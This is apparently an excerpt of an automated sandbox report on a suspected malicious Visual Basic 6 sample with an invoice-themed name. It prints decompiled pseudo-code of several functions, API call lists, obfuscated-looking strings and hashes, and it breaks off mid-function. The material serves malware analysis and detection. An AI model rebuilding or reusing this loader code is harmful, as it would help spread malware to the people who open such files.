						L00401654();
						_v276 = _t464;
					}
					_v88 = _v212;
					_v84 = _v208;
					_t469 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4);
					_v216 = _t469;
					if(_v216 >= 0) {
						_v280 = _v280 & 0x00000000;
					} else {
						_push(0x71c);
						_push(0x4024b4);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v280 = _t469;
					}
					_v164 = 0x16b;
					_v160 = 0x61b6;
					_v188 =  *0x4011c0;
					_v172 = 0x7add9f;
					_t477 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, 0x2742,  &_v172, 0x4531,  &_v188,  &_v160,  &_v164,  &_v168);
					_v216 = _t477;
					if(_v216 >= 0) {
						_v284 = _v284 & 0x00000000;
					} else {
						_push(0x720);
						_push(0x4024b4);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v284 = _t477;
					}
					_v76 = _v168;
					_t482 =  *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v160);
					_v216 = _t482;
					if(_v216 >= 0) {
						_v288 = _v288 & 0x00000000;
					} else {
						_push(0x724);
						_push(0x4024b4);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v288 = _t482;
					}
					_v92 = _v160;
					_v188 = 0x218b51f0;
					_v184 = 0x5b06;
					 *_t576 =  *0x4011b8;
					 *((intOrPtr*)( *_a4 + 0x74c))(_a4,  &_v188, _t546,  &_v160);
					_v28 = _v160;
					_t492 =  *((intOrPtr*)( *_a4 + 0x728))(_a4);
					_v216 = _t492;
					if(_v216 >= 0) {
						_v292 = _v292 & 0x00000000;
					} else {
						_push(0x728);
						_push(0x4024b4);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v292 = _t492;
					}
					L0040163C();
					_v172 = 0x53d0ea;
					_t498 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v172,  &_v100,  &_v188);
					_v216 = _t498;
					if(_v216 >= 0) {
						_v296 = _v296 & 0x00000000;
					} else {
						_push(0x72c);
						_push(0x4024b4);
						_push(_a4);
						_push(_v216);
						L00401654();
						_v296 = _t498;
					}
					_v48 = _v188;
					_v44 = _v184;
					L0040166C();
					_v160 = 0x704;
					_v172 = 0x8699bf;
					_v188 =  *0x4011b0;
					 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v188,  &_v172,  &_v160);
					_v132 = 0x2ffff;
					_v140 = 0x8003;
					_push( &_v64);
					_t508 =  &_v140;
					_push(_t508);
					L00401624();
					if(_t508 == 0) {
						break;
					}
				}
				_v20 = E0040694E;
				_t510 = _v20();
				asm("invalid");
				asm("cld");
				 *_t510 =  *_t510 + _t510;
				 *_t510 =  *_t510 + _t510;
				asm("wait");
				_push(E004089B9);
				L0040164E();
				_t511 =  &_v96;
				_push(_t511);
				_push(0);
				L00401618();
				return _t511;
			}

0x00407e37
0x00407e46
0x00407e52
0x00407e5a
0x00407e5d
0x00407e6a
0x00407e73
0x00407e7e
0x00407e81
0x00407e86
0x00407e90
0x00407e95
0x00407e96
0x00407e9b
0x00407ea2
0x00407ea8
0x00407eb2
0x00407ec0
0x00407ecd
0x00407eea
0x00407ecf
0x00407ecf
0x00407ed4
0x00407ed9
0x00407ede
0x00407ede
0x00407efc
0x00407f02
0x00407f0c
0x00407f16
0x00407f1d
0x00407f2e
0x00407f3b
0x00407f3c
0x00407f3d
0x00407f3e
0x00407f42
0x00407f4f
0x00407f50
0x00407f51
0x00407f52
0x00407f61
0x00407f64
0x00407f66
0x00407f73
0x00407f95
0x00407f75
0x00407f75
0x00407f77
0x00407f7c
0x00407f82
0x00407f88
0x00407f8d
0x00407f8d
0x00407f9f
0x00407fa3
0x00407fa4
0x00407fac
0x00407fb0
0x00407fb1
0x00407fb9
0x00407fb9
0x00407fbe
0x00407fc5
0x00407fcc
0x00407fcf
0x00407fd0
0x00407fda
0x00407fdf
0x00407fe0
0x00407fe5
0x00407fec
0x00407ff2
0x00407ffc
0x00408004
0x00408009
0x00408012
0x00408014
0x00408019
0x0040801e
0x0040801e
0x00408029
0x0040802e
0x00408037
0x00408064
0x0040806f
0x00408078
0x0040807d
0x00408087
0x00408098
0x004080b7
0x004080c6
0x004080cc
0x004080d9
0x004080fb
0x004080db
0x004080db
0x004080e0
0x004080e5
0x004080e8
0x004080ee
0x004080f3
0x004080f3
0x00408105
0x0040810a
0x00408114
0x00408126
0x0040812b
0x00408156
0x0040815c
0x00408169
0x0040818b
0x0040816b
0x0040816b
0x00408170
0x00408175
0x00408178
0x0040817e
0x00408183
0x00408183
0x00408198
0x0040819e
0x004081a9
0x004081b5
0x004081c3
0x004081ce
0x004081f5
0x004081fe
0x0040820b
0x00408215
0x00408218
0x0040822e
0x0040823d
0x00408243
0x00408250
0x00408272
0x00408252
0x00408252
0x00408257
0x0040825c
0x0040825f
0x00408265
0x0040826a
0x0040826a
0x00408283
0x00408288
0x004082a4
0x004082aa
0x004082b7
0x004082d9
0x004082b9
0x004082b9
0x004082be
0x004082c3
0x004082c6
0x004082cc
0x004082d1
0x004082d1
0x004082e7
0x004082f1
0x00408315
0x0040831b
0x00408338
0x0040833e
0x00408350
0x00408372
0x0040837b
0x00408385
0x00408388
0x0040838d
0x00408397
0x004083a1
0x004083c3
0x004083da
0x004083e0
0x004083ed
0x0040840f
0x004083ef
0x004083ef
0x004083f4
0x004083f9
0x004083fc
0x00408402
0x00408407
0x00408407
0x00408419
0x00408424
0x0040842a
0x00408439
0x00408466
0x0040846c
0x00408479
0x0040849b
0x0040847b
0x0040847b
0x00408480
0x00408485
0x00408488
0x0040848e
0x00408493
0x00408493
0x004084aa
0x004084c7
0x004084cd
0x004084da
0x004084fc
0x004084dc
0x004084dc
0x004084e1
0x004084e6
0x004084e9
0x004084ef
0x004084f4
0x004084f4
0x0040850a
0x00408511
0x00408525
0x0040852b
0x00408538
0x0040855a
0x0040853a
0x0040853a
0x0040853f
0x00408544
0x00408547
0x0040854d
0x00408552
0x00408552
0x00408567
0x00408572
0x00408578
0x0040857a
0x00408587
0x004085a9
0x00408589
0x00408589
0x0040858e
0x00408593
0x00408596
0x0040859c
0x004085a1
0x004085a1
0x004085b0
0x004085b0
0x004085b7
0x004085d0
0x004085d7
0x004085da
0x004085df
0x004085e9
0x004085f9
0x004085ff
0x00408608
0x00408612
0x0040864c
0x00408657
0x0040865d
0x0040866a
0x0040868c
0x0040866c
0x0040866c
0x00408671
0x00408676
0x00408679
0x0040867f
0x00408684
0x00408684
0x00408699
0x004086a2
0x004086ad
0x004086b3
0x004086c0
0x004086e2
0x004086c2
0x004086c2
0x004086c7
0x004086cc
0x004086cf
0x004086d5
0x004086da
0x004086da
0x004086e9
0x004086f2
0x00408701
0x00408707
0x00408746
0x0040874c
0x00408759
0x0040877b
0x0040875b
0x0040875b
0x00408760
0x00408765
0x00408768
0x0040876e
0x00408773
0x00408773
0x00408789
0x0040879c
0x004087a2
0x004087af
0x004087d1
0x004087b1
0x004087b1
0x004087b6
0x004087bb
0x004087be
0x004087c4
0x004087c9
0x004087c9
0x004087df
0x004087e3
0x004087ed
0x00408805
0x00408817
0x00408824
0x00408830
0x00408836
0x00408843
0x00408865
0x00408845
0x00408845
0x0040884a
0x0040884f
0x00408852
0x00408858
0x0040885d
0x0040885d
0x00408874
0x00408879
0x0040889d
0x004088a3
0x004088b0
0x004088d2
0x004088b2
0x004088b2
0x004088b7
0x004088bc
0x004088bf
0x004088c5
0x004088ca
0x004088ca
0x004088df
0x004088e8
0x004088ee
0x004088f3
0x004088fc
0x0040890c
0x0040892f
0x00408935
0x0040893c
0x00408949
0x0040894a
0x00408950
0x00408951
0x0040895b
0x00000000
0x00000000
0x0040895d
0x00408967
0x0040896a
0x0040896d
0x00408972
0x00408973
0x00408975
0x00408977
0x00408978
0x004089a8
0x004089ad
0x004089b0
0x004089b1
0x004089b3
0x004089b8

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00407E52
#519.MSVBVM60( tt,?,?,?,?,00401426), ref: 00407E86
__vbaStrMove.MSVBVM60( tt,?,?,?,?,00401426), ref: 00407E90
__vbaStrCmp.MSVBVM60(004026A0,00000000, tt,?,?,?,?,00401426), ref: 00407E9B
__vbaFreeStr.MSVBVM60(004026A0,00000000, tt,?,?,?,?,00401426), ref: 00407EB2
__vbaNew2.MSVBVM60(004026E4,0040C33C,004026A0,00000000, tt,?,?,?,?,00401426), ref: 00407ED9
__vbaChkstk.MSVBVM60(?), ref: 00407F2E
__vbaChkstk.MSVBVM60(?), ref: 00407F42
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000038), ref: 00407F88
__vbaVar2Vec.MSVBVM60(?,?), ref: 00407FA4
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 00407FB1
__vbaFreeVar.MSVBVM60(?,?,?,?), ref: 00407FB9
#591.MSVBVM60(00000002), ref: 00407FD0
__vbaStrMove.MSVBVM60(00000002), ref: 00407FDA
__vbaStrCmp.MSVBVM60(Integer,00000000,00000002), ref: 00407FE5
__vbaFreeStr.MSVBVM60(Integer,00000000,00000002), ref: 00407FFC
__vbaFreeVar.MSVBVM60(Integer,00000000,00000002), ref: 00408004
#569.MSVBVM60(0000008A,Integer,00000000,00000002), ref: 00408019
__vbaStrCopy.MSVBVM60(Integer,00000000,00000002), ref: 00408029
__vbaFreeStr.MSVBVM60(?,00741641,C9BFD870,00005B04,00003B49,?), ref: 00408078
__vbaStrCopy.MSVBVM60(?,00741641,C9BFD870,00005B04,00003B49,?), ref: 00408098
__vbaHresultCheckObj.MSVBVM60(?,00401218,004024B4,000006F8,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49,?), ref: 004080EE
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408105
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408126
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,000006FC,?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F), ref: 0040817E
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 0040819E
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 004081C3
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 004081FE
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 0040820B
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408218
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000700,?,?,?,00001107), ref: 00408265
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00001107,?,?,?,?,?,?,?,?,00003145), ref: 00408283
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000704), ref: 004082CC
__vbaStrCopy.MSVBVM60 ref: 00408350
__vbaFreeStr.MSVBVM60 ref: 0040837B
__vbaStrCopy.MSVBVM60 ref: 00408388
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000708,?,?,004D098C,Udsendes4,?), ref: 00408402
__vbaFreeStr.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 00408419
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,0000070C,?,?,004D098C,Udsendes4,?), ref: 0040848E
__vbaStrCopy.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 004084AA
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000710,?,?,004D098C,Udsendes4,?), ref: 004084EF
__vbaFreeStr.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 00408511
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000714,?,?,004D098C,Udsendes4,?), ref: 0040854D
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402484,000002B4,?,?,004D098C,Udsendes4,?), ref: 0040859C
__vbaVarAdd.MSVBVM60(?,00000002,?,?,?,004D098C,Udsendes4,?), ref: 004085D0
__vbaVarMove.MSVBVM60(?,00000002,?,?,?,004D098C,Udsendes4,?), ref: 004085DA
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000718,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 0040867F
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,0000071C,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 004086D5
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000720,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 0040876E
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 004087C4
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000728,?,000061B6,00000000,00401218,004024B4,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?), ref: 00408858
__vbaStrCopy.MSVBVM60(?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,?,?,004D098C), ref: 00408874
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,0000072C,?,000061B6,00000000,00401218,004024B4,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?), ref: 004088C5
__vbaFreeStr.MSVBVM60(?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,?,?,004D098C), ref: 004088EE
__vbaVarTstLt.MSVBVM60(00008003,?,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 00408951
__vbaFreeVar.MSVBVM60(004089B9,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 004089A8
__vbaAryDestruct.MSVBVM60(00000000,?,004089B9,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 004089B3

Strings

BIBLIOTEKSASSISTENT, xrefs: 004084A2
Transcriptional9, xrefs: 00408021
Udsendes4, xrefs: 004083AF
VASKERIERNES, xrefs: 00408348
Unfixedness1, xrefs: 00408203
LE, xrefs: 004085FF
tt, xrefs: 00407E81
keelboatman, xrefs: 00408301
Skibakker3, xrefs: 0040844D
lon, xrefs: 004084B6
Integer, xrefs: 00407FE0
kartoffelkurens, xrefs: 00408324
BENAMES, xrefs: 00408090
TOLDPOSTKONTORET, xrefs: 0040886C
Barreleye, xrefs: 0040811E
Reklappers, xrefs: 00407F02
Trifliers, xrefs: 00408380
REJUVENIZING, xrefs: 004081BB
Unbetide1, xrefs: 00408210

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$CheckHresult$Free$Copy$Move$Chkstk$#519#569#591DestructListNew2Var2
String ID: tt$BENAMES$BIBLIOTEKSASSISTENT$Barreleye$Integer$LE$REJUVENIZING$Reklappers$Skibakker3$TOLDPOSTKONTORET$Transcriptional9$Trifliers$Udsendes4$Unbetide1$Unfixedness1$VASKERIERNES$kartoffelkurens$keelboatman$lon
API String ID: 3969615492-959738972
Opcode ID: 75923ee7f48a88740aae2c0ec33775fa50e63ae8930f29e2fa7183d69f504eea
Instruction ID: 58eea6c1f6c0e0eb42e2cfcb6a9ae7b55d479f3acebccef80e5b5a666d87eff4
Opcode Fuzzy Hash: 75923ee7f48a88740aae2c0ec33775fa50e63ae8930f29e2fa7183d69f504eea
Instruction Fuzzy Hash: 3362F675900218EFDB11DF90CD89BDDBBB9AF08304F0084EAE549BB1A1DB795A88CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040904F, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040904F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v52;
				char _v68;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				signed int _v120;
				void* _v124;
				signed int _v128;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _t72;
				short _t74;
				signed int _t77;
				signed int _t81;
				char* _t85;
				void* _t98;
				void* _t100;
				intOrPtr _t101;

				_t101 = _t100 - 0xc;
				 *[fs:0x0] = _t101;
				L00401420();
				_v16 = _t101;
				_v12 = 0x4012a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t98);
				_push(L"4:4:4");
				_push( &_v52); // executed
				L004015AC(); // executed
				_push( &_v52);
				L004015B2();
				L00401678();
				L0040164E();
				_v92 = 0x4029a8;
				_v100 = 8;
				L004015BE();
				_push( &_v68);
				_t72 =  &_v52;
				_push(_t72);
				L004015A6();
				_v120 = _t72;
				if(_v120 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(_v120);
					L004015A0();
					_v144 = _t72;
				}
				_v108 = 2;
				_v116 = 0x8002;
				_push( &_v68);
				_t74 =  &_v116;
				_push(_t74);
				L00401612();
				_v124 = _t74;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L00401600();
				_t77 = _v124;
				if(_t77 != 0) {
					_t81 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
					asm("fclex");
					_v120 = _t81;
					if(_v120 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x402484);
						_push(_a4);
						_push(_v120);
						L00401654();
						_v148 = _t81;
					}
					if( *0x40c33c != 0) {
						_v152 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026e4);
						L0040165A();
						_v152 = 0x40c33c;
					}
					_v124 =  *_v152;
					_v140 = _v32;
					_v32 = _v32 & 0x00000000;
					_t85 =  &_v36;
					L0040159A();
					_t77 =  *((intOrPtr*)( *_v124 + 0x40))(_v124, _t85, _t85, _v140, L"Prfekt");
					asm("fclex");
					_v128 = _t77;
					if(_v128 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x4026d4);
						_push(_v124);
						_push(_v128);
						L00401654();
						_v156 = _t77;
					}
					L004015E8();
				}
				_push(E00409251);
				L0040166C();
				return _t77;
			}

0x00409052
0x00409061
0x0040906d
0x00409075
0x00409078
0x0040907f
0x0040908e
0x00409091
0x00409099
0x0040909a
0x004090a2
0x004090a3
0x004090ad
0x004090b5
0x004090ba
0x004090c1
0x004090ce
0x004090d6
0x004090d7
0x004090da
0x004090db
0x004090e0
0x004090e7
0x004090f9
0x004090e9
0x004090e9
0x004090ec
0x004090f1
0x004090f1
0x00409100
0x00409107
0x00409111
0x00409112
0x00409115
0x00409116
0x0040911b
0x00409122
0x00409126
0x00409127
0x00409129
0x00409131
0x00409137
0x00409149
0x0040914f
0x00409151
0x00409158
0x00409177
0x0040915a
0x0040915a
0x0040915f
0x00409164
0x00409167
0x0040916a
0x0040916f
0x0040916f
0x00409185
0x004091a2
0x00409187
0x00409187
0x0040918c
0x00409191
0x00409196
0x00409196
0x004091b4
0x004091ba
0x004091c0
0x004091cf
0x004091d3
0x004091e1
0x004091e4
0x004091e6
0x004091ed
0x00409209
0x004091ef
0x004091ef
0x004091f1
0x004091f6
0x004091f9
0x004091fc
0x00409201
0x00409201
0x00409213
0x00409213
0x00409218
0x0040924b
0x00409250

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040906D
#541.MSVBVM60(?,4:4:4,?,?,?,?,00401426), ref: 0040909A
__vbaStrVarMove.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 004090A3
__vbaStrMove.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 004090AD
__vbaFreeVar.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 004090B5
__vbaVarDup.MSVBVM60 ref: 004090CE
#564.MSVBVM60(?,?), ref: 004090DB
__vbaHresultCheck.MSVBVM60(00000000,?,?,?,?,?), ref: 004090EC
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409116
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409129
__vbaHresultCheckObj.MSVBVM60(00000000,004012A8,00402484,00000160), ref: 0040916A
__vbaNew2.MSVBVM60(004026E4,0040C33C), ref: 00409191
__vbaObjSet.MSVBVM60(?,?,Prfekt), ref: 004091D3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000040), ref: 004091FC
__vbaFreeObj.MSVBVM60(00000000,?,004026D4,00000040), ref: 00409213
__vbaFreeStr.MSVBVM60(00409251,?,?,00401426), ref: 0040924B

Strings

Prfekt, xrefs: 004091C4
4:4:4, xrefs: 00409091

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Move$#541#564ChkstkListNew2
String ID: 4:4:4$Prfekt
API String ID: 2750142420-1222765967
Opcode ID: caa23575c8c7f9b307eea9d9599f931be28e7c9817a3529497de66f5a474cb34
Instruction ID: 41371d639fe381b2094cfec91c1024bd5da65ec87b9d48852d0929f8c8f3d5c1
Opcode Fuzzy Hash: caa23575c8c7f9b307eea9d9599f931be28e7c9817a3529497de66f5a474cb34
Instruction Fuzzy Hash: CD51F470910219AFDB10EFA1CC89BDDBBB4BB04704F20857EE005BB1A2DB7999858F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9C4, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E0040A9C4(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
				char* _t28;
				char* _t32;
				void* _t41;
				void* _t43;
				long long* _t44;

				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				L00401420();
				_v16 = _t44;
				_v12 = 0x4013e8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401426, _t41);
				_v60 = L"HLDNINGSKOEFFICIENTERS";
				_v68 = 8;
				L004015BE();
				_push(0);
				_t28 =  &_v52;
				_push(_t28); // executed
				L004014CE(); // executed
				L00401678();
				_t32 =  &_v52;
				L0040164E();
				asm("fldz");
				_push(_t32);
				_push(_t32);
				 *_t44 = __fp0;
				L004015B8();
				L004015F4();
				asm("fcomp qword [0x401280]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v60 = L"Helligaftenens";
					_v68 = 8;
					L004015BE();
					_t28 =  &_v52;
					_push(_t28);
					L004015C4();
					L0040164E();
				}
				_v36 = 0x2986ba0;
				_v32 = 0x5af9;
				asm("wait");
				_push(E0040AAA8);
				L0040166C();
				return _t28;
			}

0x0040a9c7
0x0040a9d6
0x0040a9e0
0x0040a9e8
0x0040a9eb
0x0040a9f2
0x0040aa01
0x0040aa04
0x0040aa0b
0x0040aa18
0x0040aa1d
0x0040aa1f
0x0040aa22
0x0040aa23
0x0040aa2d
0x0040aa32
0x0040aa35
0x0040aa3a
0x0040aa3c
0x0040aa3d
0x0040aa3e
0x0040aa41
0x0040aa46
0x0040aa4b
0x0040aa51
0x0040aa53
0x0040aa54
0x0040aa56
0x0040aa5d
0x0040aa6a
0x0040aa6f
0x0040aa72
0x0040aa73
0x0040aa7b
0x0040aa7b
0x0040aa80
0x0040aa87
0x0040aa8e
0x0040aa8f
0x0040aaa2
0x0040aaa7

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A9E0
__vbaVarDup.MSVBVM60 ref: 0040AA18
#645.MSVBVM60(?,00000000), ref: 0040AA23
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040AA2D
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0040AA35
#583.MSVBVM60(?,?,?,00000000), ref: 0040AA41
__vbaFpR8.MSVBVM60(?,?,?,00000000), ref: 0040AA46
__vbaVarDup.MSVBVM60(?,?,?,00000000), ref: 0040AA6A
#529.MSVBVM60(?,?,?,?,00000000), ref: 0040AA73
__vbaFreeVar.MSVBVM60(?,?,?,?,00000000), ref: 0040AA7B
__vbaFreeStr.MSVBVM60(0040AAA8,?,?,?,00000000), ref: 0040AAA2

Strings

HLDNINGSKOEFFICIENTERS, xrefs: 0040AA04
Helligaftenens, xrefs: 0040AA56

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$#529#583#645ChkstkMove
String ID: HLDNINGSKOEFFICIENTERS$Helligaftenens
API String ID: 110701385-4233214299
Opcode ID: 2dd96d7949b1b6051845cdd1a18a3b203c5a2e28b41c7b02710b4a2105d7144b
Instruction ID: c7fdd88793d244dd19188db00eeed8981e08a2ab43351aaa0d3f4e0787805d05
Opcode Fuzzy Hash: 2dd96d7949b1b6051845cdd1a18a3b203c5a2e28b41c7b02710b4a2105d7144b
Instruction Fuzzy Hash: 0221D370910218ABDB04EF91DD9AADEBBB8BF40708F44852AF4017A1E1DB785949CB89

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409AFC, Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00409AFC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				signed int _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				signed char _v188;
				signed int _v192;
				signed char _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				signed int _v220;
				signed int _t80;
				char* _t91;
				signed char _t99;
				char* _t107;
				void* _t114;
				void* _t116;
				intOrPtr _t117;
				intOrPtr* _t118;
				signed long long _t122;

				_t117 = _t116 - 0xc;
				 *[fs:0x0] = _t117;
				L00401420();
				_v16 = _t117;
				_v12 = 0x401348;
				_v8 = 0;
				_t80 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t114);
				L0040163C();
				_push(0x402aa0);
				L0040153A();
				_push(_t80);
				L00401540();
				L00401678();
				_push(_t80);
				_push(0x402ab0);
				L0040167E();
				asm("sbb eax, eax");
				_v188 =  ~( ~( ~_t80));
				L0040166C();
				if(_v188 != 0) {
					if( *0x40c33c != 0) {
						_v204 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026e4);
						L0040165A();
						_v204 = 0x40c33c;
					}
					_v204 =  *_v204;
					_v188 =  *_v204;
					__eax =  &_v56;
					L0040152E();
					__esp = __esp + 0x10;
					L00401534();
					__eax =  &_v40;
					L00401582();
					_v188 =  *_v188;
					__eax =  *((intOrPtr*)( *_v188 + 0xc))(_v188, __eax, __eax, __eax, __eax, __eax, _v32, L"CYtZi0nszoU4nj128", 0);
					asm("fclex");
					_v192 = __eax;
					if(_v192 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0xc);
						_push(0x4026d4);
						_push(_v188);
						_push(_v192);
						L00401654();
						_v208 = __eax;
					}
					L004015E8();
					L0040164E();
				}
				_v96 = 5;
				_v104 = 2;
				_v80 = 0x63;
				_v88 = 2;
				_t36 =  &_v64;
				 *_t36 = _v64 & 0x00000000;
				_v72 = 2;
				_v48 = 0x64;
				_v56 = 2;
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push( &_v56);
				_push( &_v120);
				L0040151C();
